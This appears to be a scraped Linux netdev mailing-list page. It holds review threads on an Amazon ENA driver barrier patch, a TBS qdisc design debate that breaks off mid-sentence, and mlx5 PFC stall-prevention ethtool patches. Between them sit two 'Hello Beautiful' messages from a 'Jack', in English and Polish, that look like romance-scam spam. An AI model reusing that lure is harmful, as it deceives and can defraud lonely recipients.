I think you should either add a parameter to ena_com_write_sq_doorbell() or add ena_com_write_sq_doorbell_rel(). Right now, you have unused function. On 3/20/18, 4:43 AM, "Sinan Kaya" wrote: Code includes barrier() followed by writel(). writel() already has a barrier on some architectures like arm64. This ends up CPU observing two barriers back to back before executing the register write. Create a new wrapper function with relaxed write operator. Use the new wrapper when a write is following a barrier(). Since code already has an explicit barrier call, changing writel() to writel_relaxed(). Signed-off-by: Sinan Kaya --- drivers/net/ethernet/amazon/ena/ena_com.c | 6 -- drivers/net/ethernet/amazon/ena/ena_eth_com.h | 22 -- drivers/net/ethernet/amazon/ena/ena_netdev.c | 4 ++-- 3 files changed, 26 insertions(+), 6 deletions(-) diff --git a/drivers/net/ethernet/amazon/ena/ena_com.c b/drivers/net/ethernet/amazon/ena/ena_com.c index bf2de52..b6e628f 100644 --- a/drivers/net/ethernet/amazon/ena/ena_com.c +++ b/drivers/net/ethernet/amazon/ena/ena_com.c @@ -631,7 +631,8 @@ static u32 ena_com_reg_bar_read32(struct ena_com_dev *ena_dev, u16 offset) */ wmb(); - writel(mmio_read_reg, ena_dev->reg_bar + ENA_REGS_MMIO_REG_READ_OFF); + writel_relaxed(mmio_read_reg, + ena_dev->reg_bar + ENA_REGS_MMIO_REG_READ_OFF); for (i = 0; i < timeout; i++) { if (read_resp->req_id == mmio_read->seq_num) @@ -1826,7 +1827,8 @@ void ena_com_aenq_intr_handler(struct ena_com_dev *dev, void *data) /* write the aenq doorbell after all AENQ descriptors were read */ mb(); - writel((u32)aenq->head, dev->reg_bar + ENA_REGS_AENQ_HEAD_DB_OFF); + writel_relaxed((u32)aenq->head, + dev->reg_bar + ENA_REGS_AENQ_HEAD_DB_OFF); } int ena_com_dev_reset(struct ena_com_dev *ena_dev, diff --git a/drivers/net/ethernet/amazon/ena/ena_eth_com.h b/drivers/net/ethernet/amazon/ena/ena_eth_com.h index 2f76572..09ef7cd 100644 --- a/drivers/net/ethernet/amazon/ena/ena_eth_com.h +++ b/drivers/net/ethernet/amazon/ena/ena_eth_com.h @@ -107,7 +107,8 @@ static inline int ena_com_sq_empty_space(struct ena_com_io_sq *io_sq) return io_sq->q_depth - 1 - cnt; } -static inline int ena_com_write_sq_doorbell(struct ena_com_io_sq *io_sq) +static inline int ena_com_write_sq_doorbell(struct ena_com_io_sq *io_sq, + bool relaxed) { u16 tail; @@ -116,7 +117,24 @@ static inline int ena_com_write_sq_doorbell(struct ena_com_io_sq *io_sq) pr_debug("write submission queue doorbell for queue: %d tail: %d\n", io_sq->qid, tail); - writel(tail, io_sq->db_addr); + if (relaxed) + writel_relaxed(tail, io_sq->db_addr); + else + writel(tail, io_sq->db_addr); + + return 0; +} + +static inline int ena_com_write_sq_doorbell_rel(struct ena_com_io_sq *io_sq) +{ + u16 tail; + + tail = io_sq->tail; + + pr_debug("write submission queue doorbell for queue: %d tail: %d\n", +io_sq->qid, tail); + + writel_relaxed(tail, io_sq->db_addr); return 0; } diff --git a/drivers/net/ethernet/amazon/ena/ena_netdev.c b/drivers/net/ethernet/amazon/ena/ena_netdev.c index 6975150..0530201 100644 --- a/drivers/net/ethernet/amazon/ena/ena_netdev.c +++ b/drivers/net/ethernet/amazon/ena/ena_netdev.c @@ -556,7 +556,7 @@ static int ena_refill_rx_bufs(struct ena_ring *rx_ring, u32 num) * issue a doorbell */ wmb(); - ena_com_write_sq_doorbell(rx_ring->ena_com_io_sq); + ena_com_write_sq_doorbell(rx_ring->ena_com_io_sq, true); } rx_ring->next_to_use = next_to_use; @@ -2151,7 +2151,7 @@ static netdev_tx_t ena_start_xmit(struct sk_buff *skb, struct net_device *dev) if (netif_xmit_stopped(txq) || !skb->xmit_more) { /* trigger the dma engine */ - ena_com_write_sq_doorbell(tx_ring->ena_com_io_sq); + ena_com_write_sq_doorbell(tx_ring->ena_com_io_sq, false); u64_stats_update_begin(&tx_ring->syncp); tx_ring->tx_stats.doorbells++; u64_stats_update_end(&tx_ring->syncp); -- 2.7.4
Re: [RFC v3 net-next 13/18] net/sched: Introduce the TBS Qdisc
On Fri, 23 Mar 2018, Jesus Sanchez-Palencia wrote: > On 03/22/2018 03:52 PM, Thomas Gleixner wrote: > > So what's the plan for this? Having TAS as a separate entity or TAS feeding > > into the proposed 'basic' time transmission thing? > > The second one, I guess. That's just wrong. It won't work. See below. > Elaborating, the plan is at some point having TAS as a separate entity, > but which can use tbs for one of its classes (and cbs for another, and > strict priority for everything else, etc). > > Basically, the design would something along the lines of 'taprio'. A root > qdisc > that is both time and priority aware, and capable of running a schedule for > the > port. That schedule can run inside the kernel with hrtimers, or just be > offloaded into the controller if Qbv is supported on HW. > > Because it would expose the inner traffic classes in a mq / mqprio / prio > style, > then it would allow for other per-queue qdiscs to be attached to it. On a > system > using the i210, for instance, we could then have tbs installed on traffic > class > 0 just dialing hw offload. The Qbv schedule would be running in SW on the TAS > entity (i.e. 'taprio') which would be setting the packets' txtime before > dequeueing packets on a fast path -> tbs -> NIC. > > Similarly, other qdisc, like cbs, could be installed if all that traffic class > requires is traffic shaping once its 'gate' is allowed to execute the selected > tx algorithm attached to it. > > > I've not yet seen a convincing argument why this low level stuff with all > > of its weird flavours is superiour over something which reflects the basic > > operating principle of TSN. > > > As you know, not all TSN systems are designed the same. Take AVB systems, for > example. These not always are running on networks that are aware of any time > schedule, or at least not quite like what is described by Qbv. > > On those systems there is usually a certain number of streams with different > priorities that care mostly about having their bandwidth reserved along the > network. The applications running on such systems are usually based on AVTP, > thus they already have to calculate and set the "avtp presentation time" > per-packet themselves. A Qbv scheduler would probably provide very little > benefits to this domain, IMHO. For "talkers" of these AVB systems, shaping > traffic using txtime (i.e. tbs) can provide a low-jitter alternative to cbs, > for > instance. You're looking at it from particular use cases and try to accomodate for them in the simplest possible way. I don't think that cuts it. Let's take a step back and look at it from a more general POV without trying to make it fit to any of the standards first. I'm deliberately NOT using any of the standard defined terms. At the (local) network level you have always an explicit plan. This plan might range from no plan at all to an very elaborate plan which is strict about when each node is allowed to TX a particular class of packets. So lets assume we have the following picture: [NIC] | [ Time slice manager ] Now in the simplest case, the time slice manager has no constraints and exposes a single input which allows the application to say: "Send my packet at time X". There is no restriction on 'time X' except if there is a time collision with an already queued packet or the requested TX time has already passed. That's close to what you implemented. Is the TX timestamp which you defined in the user space ABI a fixed scheduling point or is it a deadline? That's an important distinction and for this all to work accross various use cases you need a way to express that in the ABI. It might be an implicit property of the socket/channel to which the application connects to but still you want to express it from the application side to do proper sanity checking. Just think about stuff like audio/video streaming. The point of transmission does not have to be fixed if you have some intelligent controller at the receiving end which can buffer stuff. The only relevant information is the deadline, i.e. the latest point in time where the packet needs to go out on the wire in order to keep the stream steady at the consumer side. Having the notion of a deadline and that's the only thing the provider knows about allows you proper utilization by using an approriate scheduling algorithm like EDF. Contrary to that you want very explicit TX points for applications like automation control. For this kind of use case there is no wiggle room, it has to go out at a fixed time because that's the way control systems work. This is missing right now and you want to get that right from the very beginning. Duct taping it on the interface later on is a bad idea. Now lets go one step further and create two time slices for whatever purpose still on the single node (not network wide). You want to do that because you want temporal separat
Hello Beautiful
Hi Dear, my name is Jack and i am seeking for a relationship in which i will feel loved after a series of failed relationships. I am hoping that you would be interested and we could possibly get to know each other more if you do not mind. I am open to answering questions from you as i think my approach is a little inappropriate. Hope to hear back from you. Jack.
Re: [net-next 02/15] ethtool: Add support for configuring PFC stall prevention in ethtool
On 24-Mar-18 17:57, Andrew Lunn wrote: > On Fri, Mar 23, 2018 at 03:39:12PM -0700, Saeed Mahameed wrote: >> From: Inbar Karmy >> >> In the event where the device unexpectedly becomes unresponsive >> for a long period of time, flow control mechanism may propagate >> pause frames which will cause congestion spreading to the entire >> network. >> To prevent this scenario, when the device is stalled for a period >> longer than a pre-configured timeout, flow control mechanisms are >> automatically disabled. >> >> This patch adds support for the ETHTOOL_PFC_STALL_PREVENTION >> as a tunable. >> This API provides support for configuring flow control storm prevention >> timeout (msec). >> >> Signed-off-by: Inbar Karmy >> Cc: Michal Kubecek >> Cc: Andrew Lunn >> Signed-off-by: Saeed Mahameed >> --- >> include/uapi/linux/ethtool.h | 4 >> net/core/ethtool.c | 6 ++ >> 2 files changed, 10 insertions(+) >> >> diff --git a/include/uapi/linux/ethtool.h b/include/uapi/linux/ethtool.h >> index 20da156aaf64..9dc63a14a747 100644 >> --- a/include/uapi/linux/ethtool.h >> +++ b/include/uapi/linux/ethtool.h >> @@ -217,10 +217,14 @@ struct ethtool_value { >> __u32 data; >> }; >> >> +#define PFC_STORM_PREVENTION_AUTO 0x >> +#define PFC_STORM_PREVENTION_DISABLE0 >> + >> enum tunable_id { >> ETHTOOL_ID_UNSPEC, >> ETHTOOL_RX_COPYBREAK, >> ETHTOOL_TX_COPYBREAK, >> +ETHTOOL_PFC_PREVENTION_TOUT, > > Hi Inbar > > Please could you add a comment here about the units. Ideally we want > this file to be self documenting. Thank you for the review, we will fix that. > > Andrew >
Re: [net-next 03/15] net/mlx5e: PFC stall prevention support
On 24-Mar-18 18:07, Andrew Lunn wrote: > On Fri, Mar 23, 2018 at 03:39:13PM -0700, Saeed Mahameed wrote: >> From: Inbar Karmy >> >> Implement set/get functions to configure PFC stall prevention >> timeout by tunables api through ethtool. >> By default the stall prevention timeout is configured to 8 sec. >> Timeout range is: 80-8000 msec. >> Enabling stall prevention without a specific timeout will set >> the timeout to 100 msec. > > Hi Inbar > > I think this last sentence should be talking about auto, not without a > specific timeout. Hi Andrew, Good catch, we will fix that. > >> >> Signed-off-by: Inbar Karmy >> Signed-off-by: Saeed Mahameed >> --- >> .../net/ethernet/mellanox/mlx5/core/en_ethtool.c | 57 +++ >> drivers/net/ethernet/mellanox/mlx5/core/port.c | 64 >> +++--- >> include/linux/mlx5/mlx5_ifc.h | 17 -- >> include/linux/mlx5/port.h | 6 ++ >> 4 files changed, 132 insertions(+), 12 deletions(-) >> >> diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_ethtool.c >> b/drivers/net/ethernet/mellanox/mlx5/core/en_ethtool.c >> index cc8048f68f11..62061fd23143 100644 >> --- a/drivers/net/ethernet/mellanox/mlx5/core/en_ethtool.c >> +++ b/drivers/net/ethernet/mellanox/mlx5/core/en_ethtool.c >> @@ -1066,6 +1066,57 @@ static int mlx5e_get_rxnfc(struct net_device *netdev, >> return err; >> } >> >> +#define MLX5E_PFC_PREVEN_AUTO_TOUT_MSEC 100 >> +#define MLX5E_PFC_PREVEN_TOUT_MAX_MSEC 8000 >> +#define MLX5E_PFC_PREVEN_MINOR_PRECENT 85 >> +#define MLX5E_PFC_PREVEN_TOUT_MIN_MSEC 80 >> +#define MLX5E_DEVICE_STALL_MINOR_WATERMARK(critical_tout) \ >> +max_t(u16, MLX5E_PFC_PREVEN_TOUT_MIN_MSEC, \ >> + (critical_tout * MLX5E_PFC_PREVEN_MINOR_PRECENT) / 100) >> + >> +static int mlx5e_get_pfc_prevention_tout(struct net_device *netdev, >> + u16 *pfc_prevention_tout) >> +{ >> +struct mlx5e_priv *priv= netdev_priv(netdev); >> +struct mlx5_core_dev *mdev = priv->mdev; >> + >> +if (!MLX5_CAP_PCAM_FEATURE((priv)->mdev, pfcc_mask) || >> +!MLX5_CAP_DEBUG((priv)->mdev, stall_detect)) >> +return -EOPNOTSUPP; >> + >> +return mlx5_query_port_stall_watermark(mdev, pfc_prevention_tout, NULL); > > Shouldn't you map a value of MLX5E_PFC_PREVEN_AUTO_TOUT_MSEC back to > PFC_STORM_PREVENTION_AUTO? We discussed this point internally, mapping MLX5E_PFC_PREVEN_AUTO_TOUT_MSEC (100) to PFC_STORM_PREVENTION_AUTO might cause confusion when the user explicitly asks for 100msec timeout and gets auto in his following query. Also, this way the "auto" timeout is visible to the user, which might help him get an initial clue of which values are recommended. > > Andrew >
Hello Beautiful
Cześć Drogi, nazywam się Jack i szukam związku, w którym będę czuć się kochany po serii nieudanych związków. Mam nadzieję, że byłbyś zainteresowany i moglibyśmy się lepiej poznać, jeśli nie masz nic przeciwko. Jestem otwarty na udzielanie odpowiedzi na pytania od ciebie, ponieważ uważam, że moje podejście jest trochę niewłaściwe. Mam nadzieję, że odezwę się od ciebie. Jacek.